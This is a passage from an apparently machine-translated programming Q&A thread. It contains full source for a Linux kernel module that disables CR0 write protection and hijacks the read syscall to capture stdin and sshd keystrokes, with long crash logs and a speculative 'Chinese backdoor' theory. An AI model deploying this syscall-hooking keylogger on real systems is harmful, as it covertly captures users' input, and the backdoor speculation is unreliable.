- 您不应在堆栈上为内核模块分配数组。内核 space 的堆栈非常有限。您必须在堆上分配。
if ( strlen( buf ) > 0 )
您正在调用 strlen()
的论点是:
不在内核地址space
可能不指向 null-terminated 字符串
可能根本不指向映射内存
不要那样做。使用 read()
中的 return 值来确定读取了多少数据,并使用 copy_from_user()
从用户指针复制数据。
我的 LKM 劫持 stdin/sshd 输入:https://pastebin.com/RChpbt9G
# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
我在两台计算机上都使用最新的 kali2019.2。 https://www.kali.org/downloads/
- 第一台电脑 i5-2500K - 好的。
- 第二台电脑 i7-6700HQ(硬件名称:Acer NG-G9-592-52LP/Mustang_SLS,BIOS V1.05 03/01/2016)-
gaming laptop
- 崩溃...
生成文件:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
@rm -f *.o .*.cmd .*.flags *.mod.c *.order
@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
@rm -fR .tmp*
@rm -rf .tmp_versions
LKM代码:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#define PID_MAX 32768
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.2" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq [=12=]xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned long r = 1;
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
atomic_inc( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = true;
r = original_read( regs );
if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
if ( strlen( buf ) > 0 )
info( "hacked_read: %c\n", buf[ 0 ] );
}
atomic_dec( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = false;
return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
info( "Module was loaded\n" );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) {
if ( pids[ i ] ) {
info( "Locked. pid = %d\n", i );
}
}
msleep( 5000 );
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
}
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
当我在 i5-2500K 上使用它时 - 它很好,并且键盘的每个输入都很好地显示在 /var/log/syslog 中。 然而,当我在 i7-6700HQ 上加载这个模块时,它会变得疯狂并阻塞键盘,所以我正在以这种方式对其进行测试:
#!/bin/bash
cp -v /mnt/opt2/usr_src/programming/cpp/hacked_read/hacked_read.ko /lib/modules/4.19.0-kali4-amd64/
depmod
modprobe hacked_read
sleep 10
rmmod hacked_read
我在 /var/log/syslog 中看到了这个:https://pastebin.com/D7YS3z0c
Jun 13 16:00:24 localhost kernel: [ 1624.899161] hacked_read: loading out-of-tree module taints kernel.
Jun 13 16:00:24 localhost kernel: [ 1624.899538] hacked_read: Module was loaded
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Main process exited, code=killed, status=9/KILL
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Failed with result 'signal'.
Jun 13 16:00:24 localhost kernel: [ 1624.906589] BUG: unable to handle kernel paging request at 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906592] PGD 80000002dcbe3067 P4D 80000002dcbe3067 PUD 2e3bab067 PMD 2df01c067 PTE 8000000450ae7867
Jun 13 16:00:24 localhost kernel: [ 1624.906597] Oops: 0001 [#1] SMP PTI
Jun 13 16:00:24 localhost kernel: [ 1624.906599] CPU: 4 PID: 15874 Comm: atopacctd Tainted: G O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:24 localhost kernel: [ 1624.906601] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:24 localhost kernel: [ 1624.906604] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906605] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906607] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906609] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906610] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906611] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906612] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906613] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906615] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906617] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906618] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906619] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906621] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:24 localhost kernel: [ 1624.906622] Call Trace:
Jun 13 16:00:24 localhost kernel: [ 1624.906627] do_syscall_64+0x53/0x100
Jun 13 16:00:24 localhost kernel: [ 1624.906630] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:24 localhost kernel: [ 1624.906632] RIP: 0033:0x7f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906634] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:24 localhost kernel: [ 1624.906635] RSP: 002b:00007fffc3497528 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906637] RAX: ffffffffffffffda RBX: 0000000000000009 RCX: 00007f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906638] RDX: 0000000000003e80 RSI: 00007fffc3497560 RDI: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906639] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906641] R10: 0000000000000040 R11: 0000000000000246 R12: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906642] R13: 00007fffc3497550 R14: 00007fffc349b6c0 R15: 00007fffc349b478
Jun 13 16:00:24 localhost kernel: [ 1624.906643] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:24 localhost kernel: [ 1624.906676] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:24 localhost kernel: [ 1624.906712] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:24 localhost kernel: [ 1624.906718] CR2: 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906719] ---[ end trace a09f35b7d83f68d8 ]---
Jun 13 16:00:24 localhost kernel: [ 1624.906722] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906723] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906725] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906726] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906727] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906728] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906730] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906732] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906735] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906736] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433687] BUG: unable to handle kernel paging request at 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433695] PGD 80000002e39d0067 P4D 80000002e39d0067 PUD 2e332d067 PMD 2d13bc067 PTE 80000002b4f9a867
Jun 13 16:00:25 localhost kernel: [ 1625.433708] Oops: 0001 [#2] SMP PTI
Jun 13 16:00:25 localhost kernel: [ 1625.433716] CPU: 3 PID: 21500 Comm: grep Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:25 localhost kernel: [ 1625.433719] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:25 localhost kernel: [ 1625.433729] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.433734] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.433738] RSP: 0018:ffff9f1dc5f4ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.433744] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433747] RDX: 0000000000000000 RSI: ffff8eb7ef52c020 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.433751] RBP: 0000556becd76d67 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433755] R10: ffff9f1dc5f4feb0 R11: 0000000000000001 R12: 00000000000000d8
Jun 13 16:00:25 localhost kernel: [ 1625.433758] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433763] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433767] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.433771] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.433775] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433779] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433782] Call Trace:
Jun 13 16:00:25 localhost kernel: [ 1625.433795] do_syscall_64+0x53/0x100
Jun 13 16:00:25 localhost kernel: [ 1625.433804] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:25 localhost kernel: [ 1625.433810] RIP: 0033:0x7f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433815] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:25 localhost kernel: [ 1625.433819] RSP: 002b:00007ffd300aaaa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433824] RAX: ffffffffffffffda RBX: 000000000000e000 RCX: 00007f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433828] RDX: 000000000000e000 RSI: 0000556becd76d67 RDI: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433832] RBP: 000000000000e000 R08: 000000000000000f R09: 0000000000019008
Jun 13 16:00:25 localhost kernel: [ 1625.433835] R10: 0000000000000004 R11: 0000000000000246 R12: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433839] R13: 0000000000000000 R14: 0000556becd6c800 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433843] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:25 localhost kernel: [ 1625.433931] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:25 localhost kernel: [ 1625.434030] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:25 localhost kernel: [ 1625.434046] CR2: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.434051] ---[ end trace a09f35b7d83f68d9 ]---
Jun 13 16:00:25 localhost kernel: [ 1625.434058] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.434063] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.434066] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.434071] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434074] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.434078] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434081] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:25 localhost kernel: [ 1625.434085] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434090] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434093] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.434097] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.434101] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434105] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419417] BUG: unable to handle kernel paging request at 00007ffd57fa5d6f
Jun 13 16:00:35 localhost kernel: [ 1635.419427] PGD 80000002dc983067 P4D 80000002dc983067 PUD 2d80bd067 PMD 2f3d2d067 PTE 80000003254c4867
Jun 13 16:00:35 localhost kernel: [ 1635.419442] Oops: 0001 [#3] SMP PTI
Jun 13 16:00:35 localhost kernel: [ 1635.419450] CPU: 4 PID: 21549 Comm: atop Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:35 localhost kernel: [ 1635.419454] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:35 localhost kernel: [ 1635.419464] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:35 localhost kernel: [ 1635.419470] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:35 localhost kernel: [ 1635.419475] RSP: 0018:ffff9f1dc6437f20 EFLAGS: 00010246
Jun 13 16:00:35 localhost kernel: [ 1635.419481] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419485] RDX: 0000000000000000 RSI: 0000000000000257 RDI: ffff8eb632d9fc28
Jun 13 16:00:35 localhost kernel: [ 1635.419489] RBP: 00007ffd57fa5d6f R08: 0000714c40000000 R09: 0000000000025d19
Jun 13 16:00:35 localhost kernel: [ 1635.419494] R10: 0000000000026611 R11: 0000017cc5933f1e R12: fffffffffffffe00
Jun 13 16:00:35 localhost kernel: [ 1635.419497] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419503] FS: 00007fa66b6b9d40(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419508] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:35 localhost kernel: [ 1635.419512] CR2: 00007ffd57fa5d6f CR3: 00000002e31fe005 CR4: 00000000003606e0
Jun 13 16:00:35 localhost kernel: [ 1635.419517] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419521] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419524] Call Trace:
Jun 13 16:00:35 localhost kernel: [ 1635.419538] do_syscall_64+0x53/0x100
Jun 13 16:00:35 localhost kernel: [ 1635.419548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:35 localhost kernel: [ 1635.419555] RIP: 0033:0x7fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419560] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:35 localhost kernel: [ 1635.419565] RSP: 002b:00007ffd57fa5d38 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419571] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419575] RDX: 0000000000000001 RSI: 00007ffd57fa5d6f RDI: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419579] RBP: 000056148ad79380 R08: 0000000000000000 R09: 000000000000ffff
Jun 13 16:00:35 localhost kernel: [ 1635.419583] R10: 0000000000000008 R11: 0000000000000246 R12: 00000000000003e8
Jun 13 16:00:35 localhost kernel: [ 1635.419587] R13: 000056148ad93380 R14: 000056148ad3bd20 R15: 00005614890723a6
Jun 13 16:00:35 localhost kernel: [ 1635.419592] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:35 localhost kernel: [ 1635.419690] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:35 localhost kernel: [ 1635.419800] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:35 localhost kernel: [ 1635.419817] CR2: 00007ffd57fa5d6f
如果你读过我之前的两个问题,都是关于这个 LKM 的,还有另外两个问题,我都在这个 ^ new code
中解决了。
第一个是模块卸载错误,因此几个进程不断调用 hacked_read_test
函数并因错误 can not access to this part of memory
而崩溃,因为模块已经卸载。第二个是关于所有 sys_calls 的新包装器,换句话说:"kernel code evolution/mutation",因此出现了一种通过 regs
的新方法。我已经解决了这个问题,所以我的新代码至少可以在部分机器上运行,可能带有“"old"”中央处理器。
我的问题是:为什么它在 i7-6700HQ 上崩溃?它可以是什么?
在不接受我的 asm
操作的裸硬件上带有 "XEN-like" 虚拟机的中国后门?或者什么?
查看日志文件可以看到:
